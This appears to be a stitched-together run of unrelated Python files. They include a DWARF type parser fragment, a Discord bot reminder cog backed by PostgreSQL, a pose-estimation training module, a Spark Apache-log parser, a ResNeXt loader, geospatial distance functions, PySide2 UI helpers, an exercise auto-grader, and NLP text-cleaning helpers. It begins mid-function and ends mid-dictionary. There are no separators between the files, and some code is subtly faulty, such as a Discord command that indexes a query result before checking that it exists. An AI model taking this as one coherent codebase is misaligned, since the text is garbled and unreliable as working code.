if child.attributes['DW_AT_type'].form in REFERENCE_FORM_WITH_OFFSET:
reference += self.die.cu.cu_offset
arg_types.append(self.ArgumentType(reference))
return arg_types
def _get_arguments_str(self) -> str:
"""Retruns string descripting it's members"""
description = ''
for arg_type in self.arg_types:
description += f'\n\t{arg_type}'
return description
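
# A minimal usage sketch (not part of the original module; the helper name and ELF
# path are illustrative). It assumes pyelftools' ELFFile API and shows the intended
# two-pass flow: build a ProgramType per type DIE, then resolve references by offset.
def _collect_program_types(elf_path: str) -> dict[int, ProgramType]:
    from elftools.elf.elffile import ELFFile
    types_by_offset: dict[int, ProgramType] = {}
    with open(elf_path, 'rb') as f:
        dwarf_info = ELFFile(f).get_dwarf_info()
        for cu in dwarf_info.iter_CUs():
            for die in cu.iter_DIEs():
                try:
                    program_type = ProgramType.create(die)
                except WrongDIEType:
                    continue  # DIE does not describe a type
                if program_type is not None:
                    types_by_offset[die.offset] = program_type
    # second pass: resolve DIE-offset references between the created type objects
    for program_type in types_by_offset.values():
        program_type.resolve_refs(types_by_offset)
    return types_by_offset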

# cogs/message.py
import discord, random, os, asyncio, time
from discord.ext import commands
import discord.ext.commands
import datetime, asyncpg
from cogs.pokemon import pokemon
from asyncio import sleep
from main import client
p = pokemon(client)
class message(commands.Cog):
"""A class containing commands allowing to message another discord members.
The remind commands uses PostgreSQL."""
def __init__(self, bot):
self.bot = bot
@commands.command(aliases=['alarm'])
async def reminder(self, ctx, time: int, *, message):
"""Sends a reminder to the user after time minutes. Pings the user
with the specified message."""
await p.reward(ctx.author.id, 1)
await ctx.send("I will remind you the message in " + str(time) + " minutes.")
await sleep(60 * time)
await ctx.send(f'{ctx.author.mention}' + " , you sent yourself a reminder saying: " + str(message))
@commands.command()
async def dm(self, ctx, member: discord.Member = None, *, message):
"""Private messages a user the message sent."""
await p.reward(ctx.author.id, 1)
print(member)
await member.send(f'{ctx.author}' + ' sent you a message saying: ' + message)
await ctx.send(":white_check_mark: Sent!")
@commands.command(aliases=['remind'])
async def rm(self, ctx, member: discord.Member = None, *, message):
"""Reminds a user the message sent. The maximum messages a user can have in
their inbox is 10. The next time a user posts something, the bot reminds the
user the message unless the user has nrm toggled."""
assert len(message) < 300, await ctx.send("The given message is too long to send :frowning: ")
assert len(message) > 0, await ctx.send("The given message is too short to send :frowning:")
await p.reward(ctx.author.id, 1)
member = ctx.author if member is None else member
user = await self.bot.pg_con.fetch("SELECT * FROM message WHERE id = $1", member.id)
usage = await self.bot.pg_con.fetch("SELECT * from tusage where cmd = $1", 'rm')
if not user:
await self.bot.pg_con.execute("INSERT INTO message (id) VALUES ($1) ", member.id)
user = await self.bot.pg_con.fetch("SELECT * FROM message WHERE id = $1", member.id)
if len(user[0]['msg']) > 9:
await ctx.send("The user's inbox is full :frowning: ")
return
if ctx.author.id in user[0]['blocks']:
await ctx.send(f"{member.display_name} has you blocked :frowning: ")
return
rm_number = usage[0]['usage'] + 1
message_to_send = f"{ctx.author} sent you a message saying: ** {message} ** (reminder #{rm_number}) [change this alert with the nrm command]"
await self.bot.pg_con.execute("UPDATE message SET msg = array_append (msg, $1) where id = $2", message_to_send,
member.id)
await self.bot.pg_con.execute("UPDATE tusage SET usage = $1 where cmd = $2", rm_number,
'rm') # reminder message number
await ctx.send(f"I will remind {member.display_name} the message :smile: ")
@commands.command()
async def read(self, ctx):
"""The user reads the messages in their inbox, usually if nrm is toggled on."""
await p.reward(ctx.author.id, 1)
user = await self.bot.pg_con.fetch("SELECT * FROM message WHERE id = $1", ctx.author.id) # member.id)
message = user[0]['msg']
if not user or not message:
await ctx.send("You do not have any messages in your inbox.")
return
length = len(message)
await self.bot.pg_con.execute("UPDATE message SET msg = array_remove (msg, $1) where id = $2", message[0],
ctx.author.id)
await self.bot.pg_con.execute("UPDATE message SET archive = array_append (archive, $1) where id = $2",
message[0], ctx.author.id) # stores all messages in the archive
await ctx.send(f" {ctx.author.mention}, {message[0]}. You have {length - 1} messages remaining in your inbox.")
@rm.error
async def rm_error(self, ctx, error): # Returns an error when a member cannot be found.
if isinstance(error, commands.BadArgument):
await ctx.send('I could not find that user.')
await p.reward(ctx.author.id, 1)
@commands.command()
async def block(self, ctx, *, member: discord.Member):
"""Block a member from allowing them to send messages to you. """
await p.reward(ctx.author.id, 1)
assert member.id != 203020214332424192, await ctx.send(
"You cannot block this user.") # people cannot block the user Satella#4021
user = await self.bot.pg_con.fetch("SELECT * FROM message WHERE id = $1", ctx.author.id) # member.id)
if member.id not in user[0]['blocks']:
await self.bot.pg_con.execute("UPDATE message SET blocks = array_append (blocks, $1) where id = $2",
member.id, ctx.author.id)
await ctx.send(
f"I have successfully blocked {member.display_name} from sending you remind messages :smile: ")
else:
await self.bot.pg_con.execute("UPDATE message SET blocks = array_remove (blocks, $1) where id = $2",
member.id, ctx.author.id)
await ctx.send(
f"I have successfully unblocked {member.display_name} from sending you remind messages :smile: ")
@commands.command()
async def blocks(self, ctx):
"""Showcases the list of people the user has blocked. """
await p.reward(ctx.author.id, 1)
user = await self.bot.pg_con.fetch("SELECT blocks FROM message WHERE id = $1", ctx.author.id) # member.id)
if not user or not user[0]['blocks']:
await ctx.send(f"{ctx.author.display_name}, you do not have anyone blocked.")
return
lst = []
for item in user[0]['blocks']:
lst.append(ctx.guild.get_member(item).name)
rv = ", ".join(lst)
await ctx.send(f"{ctx.author.display_name}, you have blocked: {rv} ({len(lst)} blocks total)")
@commands.command()
async def nrm(self, ctx):
"""If nrm is toggled on, remind messages won't be shown automatically. Instead,
the user must use the read command to read messages that are sent to their inbox. """
await p.reward(ctx.author.id, 1)
user = await self.bot.pg_con.fetch("SELECT nrm FROM message WHERE id = $1", ctx.author.id)
        if not user:
            await self.bot.pg_con.execute("INSERT INTO message (id, nrm) VALUES ($1, True) ", ctx.author.id)
            await ctx.send(f"{ctx.author.display_name}, you have turned off automatic reminds.")
            return
if not user[0]['nrm']: # automatic reminds are currently on and will be off
await self.bot.pg_con.execute("UPDATE message SET nrm = $1 where id = $2", True, ctx.author.id)
await ctx.send(f"{ctx.author.display_name}, you have turned off automatic reminds.")
elif user[0]['nrm']:
await self.bot.pg_con.execute("UPDATE message SET nrm = $1 where id = $2", False, ctx.author.id)
await ctx.send(f"{ctx.author.display_name}, you have turned on automatic reminds.")
def setup(bot):
bot.add_cog(message(bot))
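
# A schema sketch (column names inferred from the queries above; the exact types used
# by the original project are unknown, so treat this as an assumption): the cog expects
# a "message" table keyed by user id and a "tusage" table with per-command counters.
async def ensure_message_schema(pg_con):
    await pg_con.execute("""
        CREATE TABLE IF NOT EXISTS message (
            id      BIGINT PRIMARY KEY,
            msg     TEXT[]   DEFAULT '{}',
            archive TEXT[]   DEFAULT '{}',
            blocks  BIGINT[] DEFAULT '{}',
            nrm     BOOLEAN  DEFAULT FALSE
        )""")
    await pg_con.execute("""
        CREATE TABLE IF NOT EXISTS tusage (
            cmd   TEXT PRIMARY KEY,
            usage INTEGER DEFAULT 0
        )""")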

from os.path import join
import torch
from kornia import geometry
from ..agents.base import BaseModule
from ..dataset import JointsConstructor
from ..models.hourglass import HourglassModel
from ..models.metrics import MPJPE
from ..utils import average_loss
class HourglassEstimator(BaseModule):
"""
Agent for training and testing 2d joints estimation using multi-stage Hourglass model
"""
def __init__(self, hparams):
super(HourglassEstimator, self).__init__(hparams, JointsConstructor)
self.n_channels = self._hparams.dataset.n_channels
self.n_joints = self._hparams.dataset.N_JOINTS
params = {
'n_channels':
self._hparams.dataset['n_channels'],
'N_JOINTS':
self._hparams.dataset['N_JOINTS'],
'backbone_path':
join(self._hparams.model_zoo, self._hparams.training.backbone),
'n_stages':
self._hparams.training['stages']
}
self.model = HourglassModel(**params)
self.metrics = {"MPJPE": MPJPE(reduction=average_loss)}
def forward(self, x):
x = self.model(x)
return x
def predict(self, output):
"""
It calculates 2d joints as pixel coordinates (x, y) on image plane.
Args:
output: Output of the model
Returns:
torch tensor of shape (BATCH_SIZE, NUM_JOINTS, 2)
"""
pred_joints = geometry.denormalize_pixel_coordinates(
geometry.spatial_expectation2d(output[-1]),
self._hparams.dataset.MAX_HEIGHT, self._hparams.dataset.MAX_WIDTH)
return pred_joints
def _calculate_loss(self, outs, b_y, b_masks):
loss = 0
for x in outs:
loss += self.loss_func(x, b_y, b_masks)
return loss
def _eval(self, batch):
b_x, b_y, b_masks = batch
output = self.forward(b_x) # cnn output
loss = self._calculate_loss(output, b_y, b_masks)
gt_joints = geometry.denormalize_pixel_coordinates(
b_y, self._hparams.dataset.MAX_HEIGHT, self._hparams.dataset.MAX_WIDTH)
pred_joints = self.predict(output)
results = {
metric_name: metric_function(pred_joints, gt_joints, b_masks)
for metric_name, metric_function in self.metrics.items()
}
return loss, results
def training_step(self, batch, batch_idx):
b_x, b_y, b_masks = batch
outs = self.forward(b_x) # cnn output
loss = self._calculate_loss(outs, b_y, b_masks)
logs = {"loss": loss}
return {"loss": loss, "log": logs}
def validation_step(self, batch, batch_idx):
loss, results = self._eval(batch)
return {"batch_val_loss": loss, **results}
def validation_epoch_end(self, outputs):
avg_loss = torch.stack([x['batch_val_loss'] for x in outputs]).mean()
results = self._get_aggregated_results(outputs, 'val_mean')
logs = {'val_loss': avg_loss, **results, 'step': self.current_epoch}
return {'val_loss': avg_loss, 'log': logs, 'progress_bar': logs}
def test_step(self, batch, batch_idx):
loss, results = self._eval(batch)
return {"batch_test_loss": loss, **results}
def test_epoch_end(self, outputs):
avg_loss = torch.stack([x['batch_test_loss'] for x in outputs]).mean()
results = self._get_aggregated_results(outputs, 'test_mean')
logs = {'test_loss': avg_loss, **results, 'step': self.current_epoch}
return {**logs, 'log': logs, 'progress_bar': logs}
#!/usr/bin/env python2
#import pytest
from pyspark import SparkContext,HiveContext
################################################################
## Code for parsing Apache weblogs
## This is an improved parser that's tolerant of bad data.
## Instead of throwing an error, it return a Row() object
## with all NULLs
from pyspark.sql import Row
import dateutil, dateutil.parser, re
APPACHE_COMBINED_LOG_REGEX = '([(\d\.)]+) [^ ]+ [^ ]+ \[(.*)\] "(.*)" (\d+) [^ ]+ ("(.*)")? ("(.*)")?'
WIKIPAGE_PATTERN = "(index.php\?title=|/wiki/)([^ &]*)"
appache_re = re.compile(APPACHE_COMBINED_LOG_REGEX)
wikipage_re = re.compile(WIKIPAGE_PATTERN)
def parse_apache_log(logline):
from dateutil import parser
m = appache_re.match(logline)
if m==None: return Row(ipaddr=None, timestamp = None, request = None, result = None,
user=None, referrer = None, agent = None, url = None, datetime = None,
date = None, time = None, wikipage = None)
timestamp = m.group(2)
request = m.group(3)
agent = m.group(7).replace('"','') if m.group(7) else ''
request_fields = request.split(" ")
url = request_fields[1] if len(request_fields)>2 else ""
datetime = parser.parse(timestamp.replace(":", " ", 1)).isoformat()
(date,time) = (datetime[0:10],datetime[11:])
n = wikipage_re.search(url)
wikipage = n.group(2) if n else ""
return Row( ipaddr = m.group(1), timestamp = timestamp, request = request,
result = int(m.group(4)), user = m.group(5), referrer = m.group(6),
agent = agent, url = url, datetime = datetime, date = date,
time = time, wikipage = wikipage)
def raw_logs(sc):
return sc.textFile("s3://gu-anly502/ps05/forensicswiki/2012/??/*")
def logs(sc):
"""Return a RDD with the parsed logs"""
return sc.textFile("s3://gu-anly502/ps05/forensicswiki/2012/??/*").\
map(lambda line:parse_apache_log(line))
#
# try this from the command line:
# ipyspark --py-files=fwiki.py
# import fwiki
# char_logs = fwiki.raw_logs(sc).filter(lambda line:"CHAR" in line)
# char_df = sqlCtx.createDataFrame(char_logs.map(fwiki.parse_apache_log))
# char_df.cache()
# char_df.registerTempTable("logs")
# sqlCtx.sql("select count(*) from logs").collect()
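#
# A small self-test sketch (the log line below is made up, not taken from the dataset);
# it only exercises parse_apache_log and needs python-dateutil plus pyspark installed.
if __name__ == "__main__":
    sample = ('1.2.3.4 - - [12/Mar/2012:03:15:00 +0000] '
              '"GET /wiki/Main_Page HTTP/1.1" 200 5043 '
              '"http://example.com/" "Mozilla/5.0"')
    row = parse_apache_log(sample)
    print("date=%s time=%s wikipage=%s" % (row.date, row.time, row.wikipage))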

from app.infrastructure.repositories.camera.capture import CameraCapture
def main():
CameraCapture().run()
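
# Entry-point guard (an assumed convention; the original snippet only defined main()):
if __name__ == "__main__":
    main()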

import torch.nn as nn
import torch.utils.model_zoo as model_zoo
from .resnext101_32x4d_features import resnext101_32x4d_features,resnext101_32x4d_features_blob
__all__ = ['ResNeXt101_32x4d', 'resnext101_32x4d']
pretrained_settings = {
'resnext101_32x4d': {
'imagenet': {
'url': 'http://data.lip6.fr/cadene/pretrainedmodels/resnext101_32x4d-29e315fa.pth',
'input_space': 'RGB',
'input_size': [3, 224, 224],
'input_range': [0, 1],
'mean': [0.485, 0.456, 0.406],
'std': [0.229, 0.224, 0.225],
'num_classes': 1000
}
},
'resnext101_64x4d': {
'imagenet': {
'url': 'http://data.lip6.fr/cadene/pretrainedmodels/resnext101_64x4d-e77a0586.pth',
'input_space': 'RGB',
'input_size': [3, 224, 224],
'input_range': [0, 1],
'mean': [0.485, 0.456, 0.406],
'std': [0.229, 0.224, 0.225],
'num_classes': 1000
}
}
}
class ResNeXt101_32x4d_blob(nn.Module):
def __init__(self, num_classes=1000):
super(ResNeXt101_32x4d_blob, self).__init__()
self.num_classes = num_classes
resnext = resnext101_32x4d_features_blob()
self.features = resnext.resnext101_32x4d_features
self.avg_pool = nn.AvgPool2d((7, 7), (1, 1))
self.last_linear = nn.Linear(2048, num_classes)
def logits(self, input):
x = self.avg_pool(input)
x = x.view(x.size(0), -1)
x = self.last_linear(x)
return x
def forward(self, input):
x = self.features(input)
x = self.logits(x)
return x
class ResNeXt101_32x4d(nn.Module):
def __init__(self, num_classes=1000):
super(ResNeXt101_32x4d, self).__init__()
self.num_classes = num_classes
resnext = resnext101_32x4d_features()
self.stem = resnext.resnext101_32x4d_stem
self.layer1 = resnext.resnext101_32x4d_layer1
self.layer2 = resnext.resnext101_32x4d_layer2
self.layer3 = resnext.resnext101_32x4d_layer3
self.layer4 = resnext.resnext101_32x4d_layer4
self.avg_pool = nn.AvgPool2d((7, 7), (1, 1))
self.last_linear = nn.Linear(2048, num_classes)
def logits(self, input):
x = self.avg_pool(input)
x = x.view(x.size(0), -1)
x = self.last_linear(x)
return x
def forward(self, input):
x = self.stem(input)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.logits(x)
return x
def resnext101_32x4d(num_classes=1000, pretrained='imagenet'):
model = ResNeXt101_32x4d(num_classes=num_classes)
model_blob = ResNeXt101_32x4d_blob(num_classes=num_classes)
if pretrained is not None:
settings = pretrained_settings['resnext101_32x4d'][pretrained]
assert num_classes == settings['num_classes'], \
"num_classes should be {}, but is {}".format(settings['num_classes'], num_classes)
model_blob.load_state_dict(model_zoo.load_url(settings['url']))
model.stem = nn.Sequential(
model_blob.features[0],
model_blob.features[1],
model_blob.features[2],
model_blob.features[3],
)
model.layer1 = nn.Sequential(
model_blob.features[4],
)
model.layer2 = nn.Sequential(
model_blob.features[5],
)
model.layer3 = nn.Sequential(
model_blob.features[6],
)
model.layer4 = nn.Sequential(
model_blob.features[7],
)
        # also carry over the pretrained classifier weights from the loaded checkpoint
        model.last_linear = model_blob.last_linear
model.input_space = settings['input_space']
model.input_size = settings['input_size']
model.input_range = settings['input_range']
model.mean = settings['mean']
model.std = settings['std']
return model
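
# A brief usage sketch (illustrative; the input below is random noise, and in real use
# images should be normalized with net.mean / net.std at net.input_size resolution):
#
#     import torch
#     net = resnext101_32x4d(num_classes=1000, pretrained='imagenet')
#     net.eval()
#     with torch.no_grad():
#         logits = net(torch.randn(1, 3, 224, 224))   # -> shape (1, 1000)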
# def resnext101_64x4d(num_classes=1000, pretrained='imagenet'):
# model = ResNeXt101_64x4d(num_classes=num_classes)
# if pretrained is not None:
# settings = pretrained_settings['resnext101_64x4d'][pretrained]
# assert num_classes == settings['num_classes'], \
# "num_classes should be {}, but is {}".format(settings['num_classes'], num_classes)
# model.load_state_dict(model_zoo.load_url(settings['url']))
# model.input_space = settings['input_space']
# model.input_size = settings['input_size']
# model.input_range = settings['input_range']
# model.mean = settings['mean']
# model.std = settings['std']
#     return model

# repo: KevinWhalen/pcml
"""
Copyright (c) 2014 High-Performance Computing and GIS (HPCGIS) Laboratory. All rights reserved.
Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
Authors and contributors: <NAME> (<EMAIL>); <NAME> (<EMAIL>, <EMAIL>)
"""
from ..core.Operation import *
from ..core.Scheduler import *
from ..util.OperationBuilder import *
import numpy as np
import types
import math
@globaloperation
def GlobalMinMHDistance(self, locations, subdomains):
pointlist=subdomains[1].get_pointlist()
locind=locations[0]
loc=subdomains[0].get_yxloc(locind) # Convert from array coordinates (r,c) to (y,x) coordinates
mindst=999999999.0
mindstindex=-1
for index in xrange(len(pointlist)):
point=pointlist[index]
dst=abs(loc['y'] - point['y']) + abs(loc['x'] - point['x'])
if dst<mindst:
mindst=dst
mindstindex=index
return mindst
@globaloperation
def GlobalMinMHDistanceIndex(self, locations, subdomains):
pointlist=subdomains[1].get_pointlist()
locind=locations[0]
loc=subdomains[0].get_yxloc(locind) # Convert from array coordinates (r,c) to (y,x) coordinates
mindst=999999999.0
mindstindex=-1
for index in xrange(len(pointlist)):
point=pointlist[index]
dst=abs(loc['y'] - point['y']) + abs(loc['x'] - point['x'])
if dst<mindst:
mindst=dst
mindstindex=index
return mindstindex
@globaloperation
def GlobalMinDistanceIndex(self, locations, subdomains):
pointlist=subdomains[1].get_pointlist()
locind=locations[0]
loc=subdomains[0].get_yxloc(locind) # Convert from array coordinates (r,c) to (y,x) coordinates
#print "loc",loc
mindst=999999999.0
mindstindex=-1
for index in xrange(len(pointlist)):
point=pointlist[index]
#print "point",point
dst=math.sqrt((loc['y'] - point['y']) ** 2 + (loc['x'] - point['x']) ** 2)
if dst<mindst:
mindst=dst
mindstindex=index
#print "mindst",mindst
return mindstindex
@globaloperation
def GlobalMinDistance(self, locations, subdomains):
pointlist=subdomains[1].get_pointlist()
locind=locations[0]
loc=subdomains[0].get_yxloc(locind) # Convert from array coordinates (r,c) to (y,x) coordinates
mindst=999999999.0
for point in pointlist:
#print "point",point
dst=math.sqrt((loc['y'] - point['y']) ** 2 + (loc['x'] - point['x']) ** 2)
if dst<mindst:
mindst=dst
#print "mindst",mindst
return mindst

# repo: rBrenick/copy-paste-overload
# Standard
import os
import sys
from functools import partial
# Not even going to pretend to have Maya 2016 support
from PySide2 import QtCore
from PySide2 import QtWidgets
from PySide2 import QtGui
from shiboken2 import wrapInstance
from PySide2 import QtUiTools
import sys
if sys.version_info.major > 2:
long = int
UI_FILES_FOLDER = os.path.dirname(__file__)
ICON_FOLDER = os.path.join(os.path.dirname(os.path.dirname(__file__)), "icons")
"""
QT UTILS BEGIN
"""
def get_app_window():
top_window = None
try:
from maya import OpenMayaUI as omui
maya_main_window_ptr = omui.MQtUtil().mainWindow()
top_window = wrapInstance(long(maya_main_window_ptr), QtWidgets.QMainWindow)
except ImportError as e:
pass
return top_window
def delete_window(object_to_delete):
qApp = QtWidgets.QApplication.instance()
if not qApp:
return
for widget in qApp.topLevelWidgets():
if "__class__" in dir(widget):
if str(widget.__class__) == str(object_to_delete.__class__):
widget.deleteLater()
widget.close()
def load_ui_file(ui_file_name):
ui_file_path = os.path.join(UI_FILES_FOLDER, ui_file_name) # get full path
if not os.path.exists(ui_file_path):
sys.stdout.write("UI FILE NOT FOUND: {}\n".format(ui_file_path))
return None
ui_file = QtCore.QFile(ui_file_path)
ui_file.open(QtCore.QFile.ReadOnly)
loader = QtUiTools.QUiLoader()
window = loader.load(ui_file)
ui_file.close()
return window
def create_qicon(icon_path):
icon_path = icon_path.replace("\\", "/")
if "/" not in icon_path:
icon_path = os.path.join(ICON_FOLDER, icon_path+".png") # find in icons folder if not full path
if not os.path.exists(icon_path):
return
return QtGui.QIcon(icon_path)
class BaseWindow(QtWidgets.QMainWindow):
def __init__(self, parent=get_app_window(), ui_file_name=None):
delete_window(self)
super(BaseWindow, self).__init__(parent)
self.ui = None
if ui_file_name:
self.load_ui(ui_file_name)
self.set_tool_icon("TOOL_NAME_icon")
self.show()
def set_tool_icon(self, icon_name):
icon = create_qicon(icon_name)
if icon:
self.setWindowIcon(icon)
def load_ui(self, ui_file_name):
self.ui = load_ui_file(ui_file_name)
self.setGeometry(self.ui.rect())
self.setWindowTitle(self.ui.property("windowTitle"))
self.setCentralWidget(self.ui)
parent_window = self.parent()
if not parent_window:
return
dcc_window_center = parent_window.mapToGlobal(parent_window.rect().center())
        window_offset_x = dcc_window_center.x() - self.geometry().width() // 2
        window_offset_y = dcc_window_center.y() - self.geometry().height() // 2
        self.move(window_offset_x, window_offset_y)  # move to dcc screen center (PySide2 expects int coordinates)
def ensure_main_layout(self):
if self.ui:
return
self.ui = QtWidgets.QWidget()
main_layout = QtWidgets.QVBoxLayout()
self.ui.setLayout(main_layout)
self.setCentralWidget(self.ui)
def add_button(self, text, command, clicked_args=None, layout=None):
self.ensure_main_layout()
btn = QtWidgets.QPushButton(text)
btn.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
if clicked_args:
btn.clicked.connect(partial(command, clicked_args))
else:
btn.clicked.connect(command)
if not layout:
layout = self.ui.layout()
layout.addWidget(btn)
"""
QT UTILS END
"""

def test():
# Here we can either check objects created in the solution code, or the
# string value of the solution, available as __solution__. A helper for
# printing formatted messages is available as __msg__. See the testTemplate
# in the meta.json for details.
# If an assertion fails, the message will be displayed
assert not cat_cols is None, "Your answer for cat_cols does not exist. Have you assigned the list of labels for categorical columns to the correct variable name?"
assert type(cat_cols) == list, "cat_cols does not appear to be of type list. Can you store all the labels of the categorical columns into a list called cat_cols?"
assert set(cat_cols) == set(['species', 'island', 'sex']), "Make sure you only include the categorical columns in cat_cols. Hint: there are 3 categorical columns in the dataframe."
assert cat_cols == ['species', 'island', 'sex'], "You're close. Please make sure that the categorical columns are ordered in the same order they appear in the dataframe."
assert not categorical_plots is None, "Your answer for categorical_plots does not exist. Have you assigned the chart object to the correct variable name?"
assert type(categorical_plots) == alt.vegalite.v4.api.RepeatChart, "Your answer is not an Altair RepeatChart object. Check to make sure that you have assigned an alt.Chart object to categorical_plots and that you are repeating by columns in cat_cols."
assert categorical_plots.spec.mark == 'circle', "Make sure you are using the 'mark_circle' to generate the plots."
assert (
([categorical_plots.spec.encoding.x.shorthand,
categorical_plots.spec.encoding.y.shorthand] ==
[alt.RepeatRef(repeat = 'row'),
alt.RepeatRef(repeat = 'column')]) or
([categorical_plots.spec.encoding.x.shorthand,
categorical_plots.spec.encoding.y.shorthand] ==
[alt.RepeatRef(repeat = 'column'),
alt.RepeatRef(repeat = 'row')])
), "Make sure you specify that the chart set-up is repeated for different rows & columns as the x-axis and y-axis encodings. Hint: use alt.repeat() with row and column arguments."
assert categorical_plots.spec.encoding.x.type == "nominal", "Make sure you let Altair know that alt.repeat() on the x-axis encoding is a nominal type. Altair can't infer the type since alt.repeat() is not a column in the dataframe."
assert categorical_plots.spec.encoding.y.type == "nominal", "Make sure you let Altair know that alt.repeat() on the y-axis encoding is a nominal type. Altair can't infer the type since alt.repeat() is not a column in the dataframe."
assert categorical_plots.spec.encoding.color != alt.utils.schemapi.Undefined and (
categorical_plots.spec.encoding.color.field in {'count()', 'count():quantitative', 'count():Q'} or
categorical_plots.spec.encoding.color.shorthand in {'count()', 'count():quantitative', 'count():Q'}
), "Make sure you are using 'count()' as the color encoding."
assert categorical_plots.spec.encoding.color.title is None, "Make sure you specify that no title should be assigned for color encoding. Hint: use None"
assert categorical_plots.spec.encoding.size != alt.utils.schemapi.Undefined and (
categorical_plots.spec.encoding.size.field in {'count()', 'count():quantitative', 'count():Q'} or
categorical_plots.spec.encoding.size.shorthand in {'count()', 'count():quantitative', 'count():Q'}
), "Make sure you are using 'count()' as the size encoding."
assert categorical_plots.spec.encoding.size.title is None, "Make sure you specify that no title should be assigned for size encoding. Hint: use None"
assert categorical_plots.resolve != alt.utils.schemapi.Undefined and categorical_plots.resolve.scale != alt.utils.schemapi.Undefined and (
categorical_plots.resolve.scale.color == "independent" and
categorical_plots.resolve.scale.size == "independent"
), "Make sure to give the size and colour channels independent scales. Hint: use resolve_scale"
__msg__.good("You're correct, well done!")

# src/utils/helpers.py
"""Helper functions for code sanity"""
import numpy as np
from tensorflow.keras.callbacks import Callback
from sklearn.metrics import accuracy_score, roc_auc_score
import re
from tqdm.notebook import tqdm
from sklearn import metrics
import matplotlib.pyplot as plt  # used by plot_loss / plot_auc below
def regular_encode(texts, tokenizer, maxlen=512):
"""
This function is from the kernel:
https://www.kaggle.com/xhlulu/jigsaw-tpu-xlm-roberta
"""
enc_di = tokenizer.batch_encode_plus(
texts,
return_attention_masks=False,
return_token_type_ids=False,
pad_to_max_length=True,
max_length=maxlen
)
return np.array(enc_di['input_ids'])
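# Usage sketch (the model name is only an example; assumes the `transformers` package):
#     from transformers import AutoTokenizer
#     tokenizer = AutoTokenizer.from_pretrained('distilbert-base-multilingual-cased')
#     input_ids = regular_encode(['some comment text'], tokenizer, maxlen=192)
#     input_ids.shape   # -> (1, 192)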
def fast_encode(texts, tokenizer, chunk_size=256, maxlen=512):
"""
https://www.kaggle.com/xhlulu/jigsaw-tpu-distilbert-with-huggingface-and-keras
"""
tokenizer.enable_truncation(max_length=maxlen)
tokenizer.enable_padding(max_length=maxlen)
all_ids = []
for i in tqdm(range(0, len(texts), chunk_size)):
text_chunk = texts[i:i+chunk_size].tolist()
encs = tokenizer.encode_batch(text_chunk)
all_ids.extend([enc.ids for enc in encs])
return np.array(all_ids)
# def build_model(transformer, max_len=512):
# """
# https://www.kaggle.com/xhlulu/jigsaw-tpu-distilbert-with-huggingface-and-keras
# """
# input_word_ids = Input(shape=(max_len,), dtype=tf.int32, name="input_word_ids")
# sequence_output = transformer(input_word_ids)[0]
# cls_token = sequence_output[:, 0, :]
# out = Dense(1, activation='sigmoid')(cls_token)
# model = Model(inputs=input_word_ids, outputs=out)
# model.compile(Adam(lr=1e-5), loss='binary_crossentropy', metrics=['accuracy'])
# return model
def roc_auc(predictions,target):
"""
ROC-AUC value for binary classification.
From:
https://www.kaggle.com/tanulsingh077/
"""
fpr, tpr, thresholds = metrics.roc_curve(target, predictions)
roc_auc = metrics.auc(fpr, tpr)
return roc_auc
class RocAucEvaluation(Callback):
'''
https://www.kaggle.com/tarunpaparaju/jigsaw-multilingual-toxicity-eda-models/output#Modeling-
'''
def __init__(self, validation_data=(), interval=1):
        super(RocAucEvaluation, self).__init__()
self.interval = interval
self.X_val, self.y_val = validation_data
def on_epoch_end(self, epoch, logs={}):
if epoch % self.interval == 0:
y_pred = self.model.predict(self.X_val, verbose=0)
score = roc_auc_score(self.y_val, y_pred)
print("\n ROC-AUC - epoch: {:d} - score: {:.6f}".format(epoch+1, score))
def build_lrfn(lr_start=0.000001, lr_max=0.000016,
lr_min=0.0000001, lr_rampup_epochs=7,
lr_sustain_epochs=0, lr_exp_decay=.87):
def lrfn(epoch):
if epoch < lr_rampup_epochs:
lr = (lr_max - lr_start) / lr_rampup_epochs * epoch + lr_start
elif epoch < lr_rampup_epochs + lr_sustain_epochs:
lr = lr_max
else:
lr = (lr_max - lr_min) * lr_exp_decay**(epoch - lr_rampup_epochs - lr_sustain_epochs) + lr_min
return lr
return lrfn
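# Usage sketch (hypothetical model / dataset): the schedule is normally handed to Keras
# through a LearningRateScheduler callback, e.g.
#     from tensorflow.keras.callbacks import LearningRateScheduler
#     lr_callback = LearningRateScheduler(build_lrfn(), verbose=1)
#     model.fit(train_dataset, epochs=20, callbacks=[lr_callback])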
##### Text cleaning
from nltk import sent_tokenize
LANGS = {
'en': 'english',
'it': 'italian',
'fr': 'french',
'es': 'spanish',
'tr': 'turkish',
'ru': 'russian',
'pt': 'portuguese'
}
def get_sentences(text, lang='en'):
return sent_tokenize(text, LANGS.get(lang, 'english'))
def exclude_duplicate_sentences(text, lang='en'):
sentences = []
for sentence in get_sentences(text, lang):
sentence = sentence.strip()
if sentence not in sentences:
sentences.append(sentence)
return ' '.join(sentences)
def clean(text):
text = text.lower()
# text = exclude_duplicate_sentences(text, lang='en')
text = re.sub('\\n',' ', text)
text = re.sub("\[\[User.*",'',text)
text = re.sub("\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}",'',text)
text = re.sub("\(http://.*?\s\(http://.*\)",'',text)
return text
# https://www.kaggle.com/chenshengabc/from-quest-encoding-ensemble-a-little-bit-differen
puncts = [')', '(', '-', '|', '$', '&', '/', '[', ']', '>', '%', '=', '#', '*', '+', '\\', '•', '~', '@', '£',
'·', '_', '{', '}', '©', '^', '®', '`', '<', '→', '°', '€', '™', '›', '♥', '←', '×', '§', '″', '′', 'Â', '█', '½', 'à', '…', '\xa0', '\t',
'“', '★', '”', '–', '●', 'â', '►', '−', '¢', '²', '¬', '░', '¶', '↑', '±', '¿', '▾', '═', '¦', '║', '―', '¥', '▓', '—', '‹', '─', '\u3000', '\u202f',
'▒', ':', '¼', '⊕', '▼', '▪', '†', '■', '’', '▀', '¨', '▄', '♫', '☆', 'é', '¯', '♦', '¤', '▲', 'è', '¸', '¾', 'Ã', '⋅', '‘', '∞', '«',
'∙', ')', '↓', '、', '│', '(', '»', ',', '♪', '╩', '╚', '³', '・', '╦', '╣', '╔', '╗', '▬', '❤', 'ï', 'Ø', '¹', '≤', '‡', '√', ]
special_puncts = [',', '.', '"', ':', '!', '?', ';', "'",]
mispell_dict = {"aren't" : "are not",
"can't" : "cannot",
"couldn't" : "could not",
"couldnt" : "could not",
"didn't" : "did not",
"doesn't" : "does not",
"doesnt" : "does not",
"don't" : "do not",
"hadn't" : "had not",
"hasn't" : "has not",
